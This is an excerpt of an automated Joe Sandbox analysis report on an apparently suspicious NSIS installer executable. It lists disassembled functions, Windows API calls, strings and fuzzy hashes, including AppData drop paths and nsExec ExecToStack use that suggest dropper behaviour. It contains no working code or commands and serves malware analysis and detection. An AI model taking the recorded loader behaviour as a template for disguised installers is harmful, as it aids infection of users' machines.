Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$antholite
API String ID: 4024019347-2831730964
Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E

Function 004032B9 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403323
GetTickCount.KERNEL32 ref: 004033CA
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033F3
wsprintfW.USER32 ref: 00403406

Strings

... %d%%, xrefs: 00403400
*B, xrefs: 004032E4
A, xrefs: 00403379
A, xrefs: 00403483
FB, xrefs: 004033A7, 004033C2, 0040343F

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ FB$ A$ A$... %d%%
API String ID: 551687249-3833040932
Opcode ID: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
Opcode Fuzzy Hash: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\erstatningsgraden\Ubekymret,?,?,00000031), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\erstatningsgraden\Ubekymret,?,?,00000031), ref: 004017DA

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,762323A0), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Strings

C:\Users\user\AppData\Roaming\erstatningsgraden\Ubekymret, xrefs: 004017A3
C:\Users\user\AppData\Local\Temp\nsr144.tmp, xrefs: 00401826, 00401844
C:\Users\user\AppData\Local\Temp\nsr144.tmp\nsExec.dll, xrefs: 0040183A, 00401856
ExecToStack, xrefs: 00401792, 0040179B, 004017A8, 004017BA, 004017C6, 004017FC, 00401812, 00401830, 0040186C, 004018ED, 004018F6, 00401900, 0040190B

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsr144.tmp$C:\Users\user\AppData\Local\Temp\nsr144.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\erstatningsgraden\Ubekymret$ExecToStack
API String ID: 1941528284-1034864772
Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D

Function 004055DC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,762323A0), ref: 00405637
SetWindowTextW.USER32(antholite,antholite), ref: 00405649
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Strings

antholite, xrefs: 004055FD, 0040560D, 00405613, 00405636, 00405642

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: antholite
API String ID: 2531174081-3488562018
Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8

Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
wsprintfW.USER32 ref: 0040692D
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941

Strings

%s%S.dll, xrefs: 00406927
UXTHEME, xrefs: 004068E4

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

Function 00406076 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406094
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040607B
nsa, xrefs: 00406083

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1857211195
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768

Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsr144.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsr144.tmp,C:\Users\user\AppData\Local\Temp\nsr144.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\7uY105UTJU.exe"), ref: 00405EDF
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F

Part of subcall function 00405AAB: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AED

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\erstatningsgraden\Ubekymret,?,00000000,000000F0), ref: 00401652

Strings

C:\Users\user\AppData\Roaming\erstatningsgraden\Ubekymret, xrefs: 00401645

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\erstatningsgraden\Ubekymret
API String ID: 1892508949-3838232433
Opcode ID: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
Opcode Fuzzy Hash: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E

Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108

Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,762323A0), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
Opcode Fuzzy Hash: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D

Function 0040252F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsr144.tmp,00000000,00000011,00000002), ref: 00402602

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: de231594f5fd9ed2f3d170b787f0c7ae88dddfe38e809d01203d2a2c86ad2b9e
Instruction ID: fa4e9c421320e09d3f2bb14c05bc69cdd2f01bdd483ca55c6e8c3e2e171c6fbc
Opcode Fuzzy Hash: de231594f5fd9ed2f3d170b787f0c7ae88dddfe38e809d01203d2a2c86ad2b9e
Instruction Fuzzy Hash: 11116A71900219EBDB14DFA0DA989AEB7B4FF04349B20447FE406B62C0D7B85A45EB5E

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C

Function 004056AF Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004056BF

Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534

CoUninitialize.COMBASE(00000404,00000000), ref: 0040570B

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: bbf0263ab9fe446523fd7f753457698ace2b8a2c52ebc29179148d008809b166
Instruction ID: 02e921673ef7eca27cac182cfb7c492375eb89174892ab9280a6a273fd68093a
Opcode Fuzzy Hash: bbf0263ab9fe446523fd7f753457698ace2b8a2c52ebc29179148d008809b166
Instruction Fuzzy Hash: 62F0F0728006009BE7011794AE01B9773A4EBC5316F15543BFF89632A0CB3658018B5D

Function 00405AAB Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 00405AED
GetLastError.KERNEL32 ref: 00405AFB

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9

Function 00401EE3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401F01
EnableWindow.USER32(00000000,00000000), ref: 00401F0C

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
